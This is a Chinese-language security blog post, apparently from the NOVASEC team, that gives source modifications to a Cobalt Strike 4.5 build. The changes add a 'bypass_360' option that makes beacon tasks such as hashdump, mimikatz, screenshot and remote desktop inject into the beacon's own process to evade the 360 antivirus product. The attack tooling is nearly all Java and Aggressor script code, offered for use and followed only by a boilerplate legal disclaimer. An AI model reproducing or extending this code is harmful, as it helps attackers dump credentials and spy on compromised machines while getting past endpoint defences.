CS4.5改造:补充inject self 代码
2023-10-30 10:49:27 Author: mp.weixin.qq.com(查看原文) 阅读量:6 收藏

△△△点击上方“蓝字”关注我们了解更多精彩
0x00 前言

读者要求补充inject self的实现代码
也就是以前的bypass360的代码.

0x01 代码详情
aggressor/bridges/BeaconBridge.java


接收脚本传递函数
Cortana.put(instance, "&beacon_bypass_360"this);

接收脚本传递函数
else if(name.equals("&beacon_bypass_360")) {     bids = bids(stack);     String format = BridgeUtilities.getString(stack, "");
     for(int i = 0; i < bids.length; ++i) {        this.conn.call("beacons.bypass_360", CommonUtils.args(bids[i], format));        this.conn.call("beacons.log_write", CommonUtils.args(BeaconOutput.bypass_360_out(bids[i], format)));     }  }
aggressor/browsers/Sessions.java

"bypass_360""note""process""pid""arch""last" };
在session窗口显示
aggressor/windows/BeaconConsole.java

接收beacon命令行输入
//新增 bypass_360else if (var11.is("bypass_360")) {  if (var11.verify("Z")) {     arg = var11.popString();     this.master.bypass360Handle(arg);  } else if (var11.isMissingArguments()) {     this.master.bypass360Handle("true");  }}
aggressor/windows/SecureShellConsole.java

接收beacon命令行输入
  //新增 bypass_360   else if (var8.is("bypass_360")) {     if (var8.verify("Z")) {        arg = var8.popString();        this.master.bypass360Handle(arg);     } else if (var8.isMissingArguments()) {        this.master.bypass360Handle("true");     }  }
beacon/TaskBeacon.java

根据bypass360的状态决定调用的函数
   public void Desktop(boolean var1) {      //修改增加360处理      for(int i = 0; i < this.bids.length; ++i) {         this.GoInteractive(this.bids[i]);         BeaconEntry beaconEntry = DataUtils.getBeacon(this.datathis.bids[i]);         //Desktop函数新增 Bypass360处理         if (beaconEntry!=null) {            if (beaconEntry.getBypass360()) {               this.log_task(this.bids[i], "Bypass 360: Tasked desktop job inject to self process: " + beaconEntry.getPid());               int pid = common.CommonUtils.toNumber(beaconEntry.getPid(), 0);               (new beacon.jobs.DesktopJob(this)).inject(this.bids[i], pid, beaconEntry.arch(), var1);            }            else {               (new DesktopJob(this)).spawn(this.bids[i], this.arch(this.bids[i]), var1);            }         }      }   }
   public void Hashdump() {      String[] bids = this.bids;      int length = bids.length;      //新增 getBypass360 处理功能      for(int i = 0; i < length; ++i) {         String var4 = bids[i];         BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, var4);         String systemArch = beaconEntry.is64() ? "x64" : "x86";
         if (beaconEntry.getBypass360()) {            if (systemArch.equals(beaconEntry.arch())) {               this.log_task(var4, "Bypass 360: Tasked hashdump job inject to self process: " + beaconEntry.getPid());               int pid = common.CommonUtils.toNumber(beaconEntry.getPid(), 0);               (new beacon.jobs.HashdumpJob(this)).inject(var4, pid, beaconEntry.arch());            } else {               this.error(var4, "Bypass 360: Do not inject into a " + beaconEntry.arch() + " process when running on a " + systemArch + " system.");            }         } else {            (new HashdumpJob(this)).spawn(var4, systemArch);         }      }   }
   public void MimikatzSmall(String var1, int var2, String var3) {      boolean flag = var2 >= 0 && CommonUtils.contains("x86, x64", var3);      String[] bids = this.bids;      int length = bids.length;      //新增的 bypass360 处理逻辑      for(int i = 0; i < length; ++i) {         String beacon = bids[i];         BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, beacon);         if (beaconEntry != null) {            String systemArch = beaconEntry.is64() ? "x64" : "x86";            if (beaconEntry.getBypass360()) {               if (systemArch.equals(beaconEntry.arch())) {                  this.log_task(beacon, "Bypass 360: Tasked mimikatzsmall job inject to self process: " + beaconEntry.getPid());                  int pid = CommonUtils.toNumber(beaconEntry.getPid(), 0);                  (new MimikatzJobSmall(this, var1)).inject(beacon, pid, systemArch);               } else {                  this.error(beacon, "Bypass 360: Do not inject into a " + beaconEntry.arch() + " process when running on a " + systemArch + " system.");               }            }            else if (flag) {               if (systemArch.equals(var3)) {                  (new MimikatzJobSmall(this, var1)).inject(beacon, var2, var3);               } else {                  this.error(beacon, "Do not inject into a " + var3 + " process when running on a " + systemArch + " system.");               }            }            else {               (new MimikatzJobSmall(this, var1)).spawn(beacon, systemArch);            }         }      }   }
   public void Printscreen() {      String[] bids = this.bids;      int length = bids.length;      //新增Printscreen代码处理逻辑      for(int i = 0; i < length; ++i) {         String bid = bids[i];         BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, bid);         if (beaconEntry != null) {            if (beaconEntry.getBypass360()) {               this.log_task(bid, "Bypass 360: Tasked printscreen job inject to self process: " + beaconEntry.getPid());               int pid = CommonUtils.toNumber(beaconEntry.getPid(), 0);               ScreenshotJob.Printscreen(this).inject(bid, pid, beaconEntry.arch());            }            else{               ScreenshotJob.Printscreen(this).spawn(bid, beaconEntry.arch());            }         }      }   }
   public void Screenshot() {      String[] bids = this.bids;      int length = bids.length;
      for(int i = 0; i < length; ++i) {         String bid = bids[i];         BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, bid);         //Screenshot功能更 新增 bypass360处理         if (beaconEntry != null) {            if (beaconEntry.getBypass360()) {               this.log_task(bid, "Bypass 360: Tasked screenshot job inject to self process: " + beaconEntry.getPid());               int number = CommonUtils.toNumber(beaconEntry.getPid(), 0);               ScreenshotJob.Screenshot(this).inject(bid, number, beaconEntry.arch());            } else {               ScreenshotJob.Screenshot(this).spawn(bid, beaconEntry.arch());            }         }      }   }
   ///新增 bypass360 处理函数   public void bypass360Handle(String arg) {      for(int i = 0; i < this.bids.length; ++i) {         this.conn.call("beacons.bypass_360", CommonUtils.args(this.bids[i], arg));         this.conn.call("beacons.log_write", CommonUtils.args(BeaconOutput.bypass_360_out(this.bids[i], arg)));      }   }
common/BeaconEntry.java

session窗口中内容显示状态
map.put("bypass_360", this.bypass_360 + "");
common/BeaconOutput.java

传递状态

      case 14:         //新增 bypass_360         return this.prefix("bypass_360");

 case 14:   CommonUtils.writeUTF8(var1, "[bypass_360] " + this.text);
server/Beacons.java

CNA调用函数逻辑

//新增存入bypass_360键值对calls.put("beacons.bypass_360", this);

CNA调用函数逻辑
//新增 bypass360 函数处理else if (r.is("beacons.bypass_360", 2)) {   this.bypass360Handle((String)r.arg(0), (String)r.arg(1));}//新增 bypass360 函数处理else if (r.is("beacons.bypass_360", 1)) {   this.bypass360Handle((String)r.arg(0), "true");}
scripts/default.cna

CNA配置UI调用函数
        item "&Bypass360" {            $bid = $1;            $dialog = dialog("Bypass360", %(bool_flags => ""), &Bypass360);            dialog_description($dialog, "Set the Beacon's Bypass360 ");            drow_combobox($dialog, "bool_flags", "bool_flag:", @("true", "false"));            dbutton_action($dialog, "Bypass360");            dialog_show($dialog);        }
        sub "Bypass360" {            binput($bid, "bypass_360 $3['bool_flags']");            beacon_bypass_360($bid, $3['bool_flags']);        }  }

0x02 总结
 
因为在bypass360之前还加了setchar函数,所有行号会有所差异。
如有遗漏,可以通过对比逆向程序来进行修改
0x99 免责声明

在学习本文技术或工具使用前,请您务必审慎阅读、充分理解各条款内容。

1、本团队分享的任何类型技术、工具文章等文章仅面向合法授权的企业安全建设行为与个人学习行为,严禁任何组织或个人使用本团队技术或工具进行非法活动。

2、在使用本文相关工具及技术进行测试时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。如您仅需要测试技术或工具的可行性,建议请自行搭建靶机环境,请勿对非授权目标进行扫描。

3、如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。

4、本团队目前未发起任何对外公开培训项目和其他对外收费项目,严禁任何组织或个人使用本团队名义进行非法盈利。

5、本团队所有分享工具及技术文章,严禁不经过授权的公开分享。

如果发现上述禁止行为,我们将保留追究您法律责任的权利,并由您自身承担由禁止行为造成的任何后果。

END

如您有任何投稿、问题、建议、需求、合作、后台留言NOVASEC公众号!

或添加NOVASEC-余生 以便于及时回复。

感谢大哥们的对NOVASEC的支持点赞和关注

加入我们与萌新一起成长吧!

本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!


文章来源: https://mp.weixin.qq.com/s?__biz=MzUzODU3ODA0MA==&mid=2247489169&idx=2&sn=c0700ae0ddc3b25c1f06a29d0dd64a26&chksm=fad4cb86cda3429066a18cff2080705ff1551d875f1a149d6f0a253b16215219d480ddd88f77&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh